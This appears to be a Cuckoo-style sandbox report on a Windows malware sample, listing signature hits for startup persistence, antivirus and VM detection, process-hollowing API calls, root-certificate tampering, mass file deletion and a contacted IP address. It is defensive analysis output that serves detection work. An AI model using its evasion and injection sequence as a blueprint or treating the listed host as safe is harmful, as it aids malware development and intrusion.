
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2j1wOSyRRZlvfDus5qwAvi0Z.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gv7KUB2WXOGafSmmePHVuGjD.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Re18YuYGdBpHTOA8LxxtyXKY.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z3O1vJkq2hH3jlVWjFUzzopv.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BKnZQWmwI7yOAr8qAggqu69D.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X5tZBxWiKmOFIzxOhnZu8gKe.bat

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle Oct. 30, 2023, 7:42 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle Oct. 30, 2023, 7:42 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\Broom.exe

Drops a binary and executes it (3 events)

file	C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe
file	C:\Users\test22\Pictures\KSJwZi29NbbVybij1oTo3y55.exe
file	C:\Users\test22\Pictures\X99uIwvqb4Dlov1MlVEvrzyW.exe

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 30, 2023, 7:42 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2812 process_handle: 0x0000009c	1	1	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2312 called NtSetContextThread to modify thread in remote process 2812
NtSetContextThread Oct. 30, 2023, 7:42 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4206040 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000098 process_identifier: 2812	1	0	0

Drops 159 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 159 events)

file	C:\Windows\Prefetch\PYTHON.EXE-C663CFDC.pf
file	C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-305B5E54.pf
file	C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf
file	C:\Windows\Prefetch\THUNDERBIRD.EXE-A0DA674F.pf
file	C:\Windows\Prefetch\DLLHOST.EXE-4F28A26F.pf
file	c:\Windows\Temp\fwtsqmfile01.sqm
file	C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file	C:\Windows\Prefetch\GOOGLEUPDATE.EXE-D0E66F4A.pf
file	C:\Windows\Prefetch\86.0.4240.111_CHROME_INSTALLE-AF26656A.pf
file	C:\Windows\Prefetch\CSC.EXE-BE9AC2DF.pf
file	c:\Windows\Temp\fwtsqmfile00.sqm
file	C:\Windows\Prefetch\SOFTWARE_REPORTER_TOOL.EXE-EB18F4FF.pf
file	C:\Windows\Prefetch\TASKHOST.EXE-7238F31D.pf
file	C:\Users\test22\AppData\Local\Temp\~DF8C0F100C7231519A.TMP
file	C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file	C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf
file	C:\Windows\Prefetch\SLUI.EXE-724E99D9.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file	C:\Windows\Prefetch\PING.EXE-7E94E73E.pf
file	C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file	C:\Windows\Prefetch\IEXPLORE.EXE-4B6C9213.pf
file	C:\Windows\Prefetch\WMIPRVSE.EXE-1628051C.pf
file	C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file	C:\Windows\Prefetch\CHROME.EXE-D999B1BA.pf
file	C:\Windows\Prefetch\IMKRMIG.EXE-AAA206C5.pf
file	C:\Windows\Prefetch\UNPACK200.EXE-E4DF1A4E.pf
file	C:\Users\test22\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
file	C:\Windows\Prefetch\DLLHOST.EXE-40DD444D.pf
file	C:\Windows\Prefetch\7ZFM.EXE-22E64FB8.pf
file	C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-B0D5C571.pf
file	C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-34B7EAE8.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file	C:\Windows\Prefetch\LOGONUI.EXE-09140401.pf
file	C:\Windows\Prefetch\AgGlFgAppHistory.db
file	C:\Windows\Prefetch\JAVAW.EXE-D0AA8787.pf
file	C:\Windows\Prefetch\SSVAGENT.EXE-0CD059B7.pf
file	C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file	C:\Windows\Prefetch\OSE.EXE-2B23CA4C.pf
file	C:\Windows\Prefetch\INSTALLER.EXE-60163557.pf
file	C:\Program Files (x86)\EAudioConverter\unins000.dat
file	C:\Windows\Prefetch\PINGSENDER.EXE-8E79128B.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file	C:\Windows\Prefetch\AgRobust.db
file	C:\Windows\Prefetch\ICACLS.EXE-B19DE1F7.pf
file	C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file	C:\Windows\Prefetch\GOOGLEUPDATECOMREGISTERSHELL6-BB6760AF.pf
file	C:\Windows\Prefetch\NOTEPAD.EXE-D8414F97.pf
file	C:\Windows\Prefetch\7ZG.EXE-0F8C4081.pf
file	C:\Windows\Prefetch\CMD.EXE-AC113AA8.pf
file	C:\Windows\Prefetch\AgGlGlobalHistory.db

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 443 events)

file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file	C:\Windows\Prefetch\SNIPPINGTOOL.EXE-EFFDAFDE.pf
file	C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg
file	C:\Users\test22\AppData\Local\Temp\is-BLFK2.tmp\_isetup\_iscrypt.dll
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\override[1].css
file	C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini
file	C:\Users\test22\AppData\Local\Temp\is-BLFK2.tmp\_isetup\_setup64.tmp
file	C:\Windows\Prefetch\MAINTENANCESERVICE.EXE-FA0B1B99.pf
file	C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp
file	C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\mnrstrtr[1].js
file	C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000026.log
file	C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file	C:\Windows\Prefetch\CVTRES.EXE-2B9D810D.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png
file	C:\Windows\Prefetch\RUNDLL32.EXE-8C11D845.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\keys_js5[2].htm
file	C:\Windows\Prefetch\WERMGR.EXE-0F2AC88C.pf
file	C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-4366A668.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-87432CEE.pf
file	C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file	C:\Windows\Prefetch\AgAppLaunch.db
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file	c:\Windows\Temp\TS_7FC6.tmp
file	C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file	C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file	C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file	C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AdPostInjectAsync[1].nhn
file	C:\Windows\Prefetch\AgGlGlobalHistory.db
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\ipsec[4].htm
file	C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\invalidcert[1]
file	C:\Windows\Prefetch\DLLHOST.EXE-97F6A314.pf
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(201804051522349E8).log
file	c:\Windows\Temp\TS_88E1.tmp
file	C:\Users\test22\AppData\Local\Temp\RD25B7.tmp
file	C:\Windows\Prefetch\JAVAWS.EXE-FE17358E.pf
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\TopNav[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\554576[1].htm
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\getLoginStatus[2].nhn
file	C:\Windows\Prefetch\ELEVATION_SERVICE.EXE-9F359A74.pf
file	C:\Users\test22\AppData\Local\Temp\123.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 940 resumed a thread in remote process 1372
Process injection	Process 2312 resumed a thread in remote process 2812
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000000000000e4 suspend_count: 1 process_identifier: 1372	1	0	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2812	1	0	0

Tries to unhook Windows functions monitored by Cuckoo (1 event)

Time & API	Arguments	Status	Return	Repeated
__anomaly__ Oct. 30, 2023, 7:43 a.m.	tid: 2596 message: Encountered 65537 exceptions, quitting. subcategory: exception function_name:	1	0	0

Detects VirtualBox through the presence of a file (1 event)

file	C:\Windows\Prefetch\VBOXDRVINST.EXE-7DCD6070.pf

Generates some ICMP traffic

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

74.119.239.234:443

Executed a process and injected code into it, probably while unpacking (50 out of 57 events)

Time & API	Arguments	Status	Return
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000000000000b0 suspend_count: 1 process_identifier: 940	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000000000000cc suspend_count: 1 process_identifier: 940	1	0
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 800 thread_handle: 0x00000000000000e4 process_identifier: 1372 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000000000000e8	1	1
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 1372 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000000e8	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000000000000e4 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000230 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000354 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000568 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000524 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000005a0 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x0000067c suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000006a8 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000006d4 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000700 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x0000072c suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000758 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000784 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000007b4 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000007c8 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x0000080c suspend_count: 1 process_identifier: 1372	1	0
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\OiGV5idG6Va0IewnFZGxvbaJ.exe track: 0 command_line: "C:\Users\test22\Pictures\OiGV5idG6Va0IewnFZGxvbaJ.exe" filepath_r: C:\Users\test22\Pictures\OiGV5idG6Va0IewnFZGxvbaJ.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000		0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000006e4 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000007f0 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000007e0 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000734 suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 1372	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000007cc suspend_count: 1 process_identifier: 1372	1	0
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 2316 thread_handle: 0x0000021c process_identifier: 2312 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe track: 1 command_line: "C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe" filepath_r: C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000250	1	1
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 2352 thread_handle: 0x000007e0 process_identifier: 2348 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe track: 1 command_line: "C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe" filepath_r: C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000024c	1	1
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000460 suspend_count: 1 process_identifier: 1372	1	0
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 2508 thread_handle: 0x000006d8 process_identifier: 2504 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\KSJwZi29NbbVybij1oTo3y55.exe track: 1 command_line: "C:\Users\test22\Pictures\KSJwZi29NbbVybij1oTo3y55.exe" filepath_r: C:\Users\test22\Pictures\KSJwZi29NbbVybij1oTo3y55.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006c0	1	1
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x000006ec suspend_count: 1 process_identifier: 1372	1	0
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 2696 thread_handle: 0x00000358 process_identifier: 2692 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\X99uIwvqb4Dlov1MlVEvrzyW.exe track: 1 command_line: "C:\Users\test22\Pictures\X99uIwvqb4Dlov1MlVEvrzyW.exe" filepath_r: C:\Users\test22\Pictures\X99uIwvqb4Dlov1MlVEvrzyW.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000210	1	1
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x0000024c suspend_count: 1 process_identifier: 1372	1	0
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 2928 thread_handle: 0x0000033c process_identifier: 2924 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\HdSQ0OHeF4h7d8YXhPKY2Icn.exe track: 1 command_line: "C:\Users\test22\Pictures\HdSQ0OHeF4h7d8YXhPKY2Icn.exe" --silent --allusers=0 filepath_r: C:\Users\test22\Pictures\HdSQ0OHeF4h7d8YXhPKY2Icn.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000460	1	1
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 2816 thread_handle: 0x00000098 process_identifier: 2812 current_directory: filepath: C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe track: 1 command_line: "C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe" filepath_r: C:\Users\test22\Pictures\OLPMQcVX11u7l6n7z7sqO64z.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000009c	1	1
NtGetContextThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000098	1	0
NtUnmapViewOfSection Oct. 30, 2023, 7:42 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2812 process_handle: 0x0000009c	1	0
NtAllocateVirtualMemory Oct. 30, 2023, 7:42 a.m.	process_identifier: 2812 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000009c	1	0
WriteProcessMemory Oct. 30, 2023, 7:42 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2812 process_handle: 0x0000009c	1	1
NtSetContextThread Oct. 30, 2023, 7:42 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4206040 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000098 process_identifier: 2812	1	0
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2812	1	0
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 2408 thread_handle: 0x000000d0 process_identifier: 2404 current_directory: filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\is-IPHDL.tmp\bCFxiw2ka2ZDRK02w3xqyvKh.tmp" /SL5="$60028,2743617,54272,C:\Users\test22\Pictures\bCFxiw2ka2ZDRK02w3xqyvKh.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000d4	1	1
NtResumeThread Oct. 30, 2023, 7:42 a.m.	thread_handle: 0x00000164 suspend_count: 1 process_identifier: 2404	1	0
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 2556 thread_handle: 0x00000270 process_identifier: 2552 current_directory: C:\Windows\system32 filepath: track: 1 command_line: "C:\Windows\system32\schtasks.exe" /Delete /F /TN "EAC1029-3" filepath_r: stack_pivoted: 0 creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE) inherit_handles: 0 process_handle: 0x00000274	1	1
CreateProcessInternalW Oct. 30, 2023, 7:42 a.m.	thread_identifier: 2596 thread_handle: 0x00000274 process_identifier: 2592 current_directory: C:\Program Files (x86)\EAudioConverter filepath: track: 1 command_line: "C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe" -i filepath_r: stack_pivoted: 0 creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE) inherit_handles: 0 process_handle: 0x00000270	1	1
CreateProcessInternalW Oct. 30, 2023, 7:43 a.m.	thread_identifier: 1228 thread_handle: 0x00000270 process_identifier: 1044 current_directory: C:\Program Files (x86)\EAudioConverter filepath: track: 1 command_line: "C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe" -s filepath_r: stack_pivoted: 0 creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE) inherit_handles: 0 process_handle: 0x00000274	1	1

123.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All